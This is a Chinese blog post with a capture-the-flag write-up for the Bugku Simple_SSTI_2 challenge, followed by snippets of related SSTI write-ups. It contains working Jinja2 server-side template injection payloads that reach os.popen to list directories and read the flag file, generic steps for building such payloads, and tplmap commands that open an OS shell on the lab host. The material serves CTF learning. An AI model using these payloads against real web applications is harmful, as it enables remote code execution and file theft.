bugku解题篇—Simple_SSTI_2

最新推荐文章于 2025-10-21 16:45:05 发布
原创 最新推荐文章于 2025-10-21 16:45:05 发布 · 506 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #web安全

文章讲述了如何通过TPLMap漏洞利用工具,进行payload构造,包括寻找目标函数、利用未加载的子类加载模块、间接导入等方式,最终实现shell命令执行的过程。
部署运行你感兴趣的模型镜像

{{%20config.class.init.globals[%27os%27].popen(%27cat%20…/app/flag%27).read()%20}}
config为对象;
class:返回对象所属类;
init:类的初始方法,用以初始化实例;
globals(也可用func_globals):以字典返回内建模块;
OS就是返回字典里面的的一个模块
popen()返回一个输出流,通过read()读取里面的数据
payload的构造过程:
(1)明确要利用的目标函数;
(2)找到目标函数被定义的位置,哪个模块(目标模块),或者哪个类(目标类)。
(3)构造前一部分payload,大部分思路是固定的,目的是拿到所有Object类的子类。
(4)这些子类很多没有加载,调用它们里面显式定义的方法,解析器就会加载并执行这个模块,如果模块刚好存在目标函数,就跳到第六步。(直接找到目标函数)
(5)如果第五步加载的模块没有目标函数,就考虑在被加载模块中存在导入目标模块的import语句。(间接导入)
(6)导入了目标函数或者目标模块后,在当前的命名空间就存在它们的变量,接下来就通过这些变量作为调用者,调用目标函数。

git clone https://github.com/epinna/tplmap
cd tplmap
sudo yum install python-pip -y||sudo apt install python-pip #安装py2的pip
pip install -r requirements.txt
操作:
#探测注入点
./tplmap.py -u ‘http://114.67.175.244:10463/?flag’
#获取shell
./tplmap.py -u ‘http://114.67.175.244:10463/?flag’ --os-shell

您可能感兴趣的与本文相关的镜像

Python3.11

Python3.11

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

buuctf [Flask]SSTI
qq_1873822的博客
03-16 3191
漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。 复现过程 访问http://node3.buuoj.cn:29153/?name={{2*2}} 说明SSTI漏洞存在。 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warni
BUUCTF-Real-[Flask]SSTI
分享
02-02 1668
服务端模板注入SSTI,可进行代码执行操作!
Simple_SSTI_2
天天学安全专属博客
03-03 1127
Simple_SSTI_2,backup靶场
BugKu Web渗透之 Simple SQL injection
最新发布
cai_huaer的博客
10-21 1338
其中更改substr中间的参数1,即为第几个字母,更改'a'中的字母,一个个匹配,当能查到新闻的时候,表示表名的第几位字母为当前测试的字母,即可获取表名为users。然后依次用用户名的高频命名去测试:user,username,name,uname等,测试,最终测试出来,第二列,名为username。使用以下语句,一个个测试,通过修改SUBSTR的中间参数和最后的'a',一个个测试,找出用户名。由于之前已经知道列数是3,那么users表中,一个id,另外两个肯定一个是用户名,一个是密码。
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 4463
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
Bugku CTF——WEBSSTI学习笔记
qq_51096893的博客
12-19 5642
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
BUGKU-WEB Simple_SSTI_2
默默提升实验室
02-06 835
BUGKU-WEB Simple_SSTI_2
BugKu:Simple_SSTI
m0_63944205的博客
07-30 297
如图所示,我们会得到相关的提示,根据提示信息,我们利用。1.这里我们看到需要我们注入一个flag参数。3.这里我们去传入flag查看config。1.这里告诉我们需要传一个flag的参数。3.这里我们利用flask的模板注入。的模板注入,就能直接得到flag。2.我们f12查看这里提示我们。2.我们同样的去查看页面源代码。发现页面很乱,不能得到有用信息。4.我们尝试SSTI模版注入。5.我们依次读取目录看看\。我们发现了flage目录,6.我们查看flage。
BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 2071
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
[bugku]Simple_SSTI_2
ZhShy
03-10 3528
进入页面之后F12没发现什么有用的东西。 照例看看config: http://114.67.175.224:12482/?flag={{config}} 没有flag 试一试 http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 __i
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 739
考点: ①SSTI注入 最近学了学python ssti注入,找一道题练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合题目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道题比较简单,什么敏感关键词都没有过滤 ...
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2
记录笔记
04-22 1099
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2 二级标题
BugkuSimple_SSTI_2
2301_76631050的博客
07-30 570
显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后进行报错看一看网站使用的模板类型。可以看出是用的python的flask模板,开始构造语句进行注入。根据题目提示SSTI,搜索一下SSTI,了解一下。发现目录,进入app目录,发现flag文件。用cat命令查看flag,得到flag。再查看源代码,发现没有什么有用的。先用get传入一个flag参数试试。
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2816
首先打开之后是上面这样,题目有提示是ssti,所以
Bugku WEB Simple_SSTI_2
lin的博客
04-12 1627
1. 打开后,题目提示存在模板注入 2. 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 根据URL转换表,%20 -> 空格 %27 -> ', 上面的URL对应字符串为: /?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read(
BugKu-web-Simple_SSTI_2
jiuyongpinyin的博客
05-28 925
BugKu-web-Simple_SSTI_2 这道题就比上一道题相对简单了,因为可以直接使用工具tplmap 下载链接: https://github.com/aStrowxyu/ssti-tools 不过需要Python2的环境 使用工具获得shell python2 tplmap.py -u "http://114.67.246.176:12782?flag=1" --os-shell flag就在目录下 ...
bugku Simple_SSTI_2
CTF
01-30 446
直接用hacker,传入参数试一下。然后直接传入表达式,先进入到app目录中看一下,发现出现flag文件,打开后发现,需要传入一个flag参数。最后用cat直接查看,得到flag。
Bugku CTF_Web——Simple_SSTI_2
weixin_71914594的博客
11-17 335
发现这是python的模块注入。进入app目录找到flag。传入名为flag的参数。只能一个一个慢慢找了。
bugku Simple_SSTI_1
03-11
### 关于 bugku Simple_SSTI_1 漏洞详情 在探讨 `Simple_SSTI_1` 的漏洞详情时,需了解 SSTI(服务器端模板注入)是一种攻击方式,在某些编程框架中如果未能正确处理用户输入,则可能导致恶意代码执行。对于 Python 中的 SSTI 攻击而言,当应用程序使用像 Jinja2 或 Django 这样的模板引擎来渲染页面,并且允许未经验证的数据进入模板上下文中时就可能发生此类安全风险[^2]。 具体到 `Simple_SSTI_1` ,该案例通常涉及 Web 应用程序通过 URL 参数接收数据并将其直接用于构建响应内容的情况。如果开发者未对这些参数做充分过滤或者转义处理,那么攻击者就可以利用这一点构造特殊字符串触发远程命令执行等问题。 #### 解决方案与防护措施 为了防止 SSTI 类型的安全隐患发生: - **严格校验输入**:确保所有来自客户端的信息都经过严格的正则表达式匹配或其他形式的有效性检验。 - **禁用危险函数调用**:配置所使用的模板引擎使其无法访问操作系统级别的功能或是限制其能够操作的对象范围。 - **采用沙盒模式**:一些现代模板库提供了内置的安全机制,比如启用 sandboxed mode 可以有效阻止潜在危害行为的发生。 - **最小权限原则**:即使存在漏洞也应尽量减少可能造成的损失,例如运行服务进程时不赋予过高权限等做法均有助于降低风险程度。 ```python from jinja2 import Environment, select_autoescape, FileSystemLoader env = Environment( loader=FileSystemLoader('templates'), autoescape=select_autoescape(['html', 'xml']) ) template = env.get_template('mytemplate.html') rendered_output = template.render(safe_data_only="This is safe content.") ``` 上述代码展示了如何设置 Jinja2 来自动转义 HTML/XML 文件中的变量输出,从而避免 XSS 和 SSTI 风险;同时也强调了只传递必要的、已知安全的数据给模板的重要性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不爱学习的安全小白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值